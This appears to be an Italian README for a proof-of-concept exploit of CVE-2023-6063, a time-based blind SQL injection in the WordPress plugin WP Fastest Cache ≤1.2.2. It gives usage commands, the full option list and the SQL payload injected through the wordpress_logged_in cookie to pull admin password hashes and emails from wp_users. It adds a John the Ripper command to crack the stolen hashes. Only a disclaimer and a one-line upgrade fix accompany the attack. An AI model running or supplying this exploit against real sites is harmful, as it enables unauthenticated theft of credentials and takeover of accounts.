
Una prova di concetto per CVE-2023-6063, una vulnerabilità di SQL injection blind basata sul tempo in WP Fastest Cache ≤1.2.2.
Una Proof of Concept per CVE-2023-6063, una vulnerabilità di iniezione SQL cieca basata sul tempo in WP Fastest Cache ≤1.2.2. Estrae password hashate (user_pass) ed email (user_email) dalla tabella wp_users abusando del cookie wordpress_logged_in.
Questo script estrae:
Installa le dipendenze (se non sono installate):
pip install -r requirements.txt
Utilizzo base:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
Opzioni complete:
-h, --help mostra questo messaggio di aiuto ed esci
-u URL, --url URL URL completo di Wordpress per testare CVE-2023-6063
--username USERNAME Definisci un utente per estrarre la sua password hashata
-d DELAY, --delay DELAY
Tempo di attesa per la risposta web predefinito 5, minimo 2
-H HASH, --hash HASH Hash da verificare nella tabella wp_users, se l'hash contiene caratteri speciali, usa apici singoli -> '<hash>'
--domain DOMAIN Nome del dominio per la validazione dell'email
-c COOKIE, --cookie COOKIE
Specifica un nome di cookie se diverso nel tuo contesto
--status-code STATUS_CODE
Usa un codice di stato positivo specifico, predefinito 200
--debug Maggiore verbosità
--just-hash Estrai solo la password hashata
--just-email Estrai solo il valore email per un utente
Questa è una demo per l'utente admin
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Quando le hash delle password vengono divulgate, usa john o hashcat per decifrarle con l'algoritmo PHPass se la password è vulnerabile.
Esempio con John:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
Il plugin WP Fastest Cache (≤1.2.2) per WordPress è vulnerabile a un'iniezione SQL cieca non autenticata tramite il cookie wordpress_logged_in. Gli attaccanti possono sfruttare questa falla per estrarre dati sensibili (ad esempio, hash delle password, indirizzi email) dalla tabella wp_users utilizzando ritardi basati sul tempo (SLEEP()) nelle query SQL.
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 Disclaimer: Usa queste informazioni solo per test di sicurezza etici con la dovuta autorizzazione. Lo sfruttamento non autorizzato è illegale.
Aggiorna WP Fastest Cache alla versione >1.2.2.